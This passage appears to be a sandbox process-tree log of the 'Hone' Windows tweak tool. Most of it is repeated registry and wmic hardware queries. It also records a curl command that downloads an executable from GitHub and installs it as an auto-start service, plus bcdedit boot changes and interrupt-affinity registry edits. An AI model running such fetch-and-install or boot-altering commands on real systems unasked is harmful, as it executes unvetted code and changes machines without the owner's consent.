        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:4464
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:2532
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:2952
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:3656
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:4252
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2456
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:1116
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:4248
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:4224
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:2380
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:3088
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:4724
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:2648
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:4580
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:1276
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:3084
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:460
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:1644
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3524
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:5060
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:4356
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:1728
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1660
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:1616
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:2496
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:3532
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:2084
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:2388
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:5084
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:4376
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:4104
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:2800
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:1220
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:3080
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:3864
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:4368
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:4876
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:1164
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:5112
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:2364
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:4968
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:2052
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:408
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:2592
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:2728
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:4592
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:4568
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:1112
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:3340
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:1200
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:4136
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:1572
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:4904
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:3996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:976
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:3404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2392
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:788
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:2096
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4596
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:3300
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4960
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:4644
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3376
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:2620
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2652
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:4936
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1732
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:4308
      - C:\Windows\system32\sc.exe
        
        sc config "STR" start= auto
        6⤵
        Launches sc.exe
        
        PID:4516
      - C:\Windows\system32\net.exe
        
        net start STR
        6⤵
        
        PID:2552
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start STR
        7⤵
        
        PID:1384
      - C:\Windows\system32\curl.exe
        
        curl -g -L -# -o "C:\Hone\Resources\SetTimerResolutionService.exe" "https://github.com/auraside/HoneCtrl/raw/main/Files/SetTimerResolutionService.exe"
        6⤵
        
        PID:1212
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /i SetTimerResolutionService.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2640
      - C:\Windows\system32\sc.exe
        
        sc config "STR" start=auto
        6⤵
        Launches sc.exe
        
        PID:1816
      - C:\Windows\system32\net.exe
        
        net start STR
        6⤵
        
        PID:5092
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start STR
        7⤵
        
        PID:1564
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set disabledynamictick yes
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1132
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /deletevalue useplatformclock
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:3040
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value
        6⤵
        
        PID:3380
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic OS get buildnumber /value
        7⤵
        
        PID:4464
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /deletevalue useplatformtick
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1096
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:2984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:3984
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:2140
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:4948
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:2204
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4252
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:4220
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:3272
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:476
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:3248
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3012
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:320
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:3884
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:4396
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:2348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:3516
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:1644
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:3476
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:5060
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:1432
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:2156
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:4412
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2656
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:2968
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4020
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:1296
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:4452
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:5084
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:232
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:4104
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:672
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:1220
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:4736
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:3864
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:3560
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:4876
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:4540
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:5112
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:2364
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:4968
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:2052
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:4752
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:2592
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:1292
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:4592
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:3252
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:1112
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:1996
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:1200
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:1364
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:1760
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:4136
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:2376
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:456
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:1824
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:2872
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:848
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:1324
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:524
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:4064
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:788
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:4560
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4596
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:4384
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4960
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:2372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3376
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:2528
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2652
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:2568
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3820
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:2112
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4068
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:4100
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1144
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:2552
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Hone" /v AffinityTweaks /f
        6⤵
        
        PID:4624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfCores /value | find "="
        6⤵
        
        PID:3016
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get NumberOfCores /value
        7⤵
        
        PID:2088
        
        C:\Windows\system32\find.exe
        
        find "="
        7⤵
        
        PID:3208
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfLogicalProcessors /value | find "="
        6⤵
        
        PID:2964
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get NumberOfLogicalProcessors /value
        7⤵
        
        PID:4556
        
        C:\Windows\system32\find.exe
        
        find "="
        7⤵
        
        PID:3304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_USBController get PNPDeviceID| findstr /l "PCI\VEN_"
        6⤵
        
        PID:3964
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_USBController get PNPDeviceID
        7⤵
        
        PID:2640
        
        C:\Windows\system32\findstr.exe
        
        findstr /l "PCI\VEN_"
        7⤵
        
        PID:1360
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f
        6⤵
        
        PID:1132
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "08" /f
        6⤵
        
        PID:4332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get PNPDeviceID| findstr /l "PCI\VEN_"
        6⤵
        
        PID:3688
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get PNPDeviceID
        7⤵
        
        PID:2584
        
        C:\Windows\system32\findstr.exe
        
        findstr /l "PCI\VEN_"
        7⤵
        
        PID:4676
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f
        6⤵
        
        PID:2984
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "02" /f
        6⤵
        
        PID:1044
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID| findstr /l "PCI\VEN_"
        6⤵
        
        PID:2952
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:2224
        
        C:\Windows\system32\findstr.exe
        
        findstr /l "PCI\VEN_"
        7⤵
        
        PID:224
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f
        6⤵
        
        PID:992
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "04" /f
        6⤵
        
        PID:1116
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:1108
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:4224
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:560
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:2624
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:4580
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:320
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:460
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:2344
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:2348
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:4396
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3476
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3788
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:2156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:5060
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:4412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:2968
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:4020
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:1296
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:3660
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:5084
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:4376
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:4104
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2800
      - C:\Windows\system32\reg.exe
        
